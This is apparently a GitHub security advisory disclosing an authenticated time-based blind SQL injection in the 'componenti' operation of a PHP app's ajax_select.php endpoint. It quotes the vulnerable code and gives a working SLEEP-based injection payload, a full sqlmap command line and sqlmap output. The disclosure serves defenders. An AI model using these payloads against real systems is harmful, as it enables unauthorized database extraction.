GHSA-qjv8-63xq-gq8m

Summary

A SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

Proof of Concept

Vulnerable Code

File: modules/impianti/ajax/select.php:122-124

case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

Data Flow

1. Source: $_GET['options']['matricola'] → $superselect['matricola']
2. Vulnerable: User input concatenated directly into IN() clause without sanitization
3. Sink: Query executed via AJAX framework

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

<img width="1306" height="581" alt="image" src="https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011" />

SQLMap Exploitation:

sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12

<img width="1228" height="801" alt="image" src="https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b" />

Impact

• Data Exfiltration: Time-based blind SQL Injection allows complete database extraction
• Authentication Bypass: Access to sensitive component and equipment data -...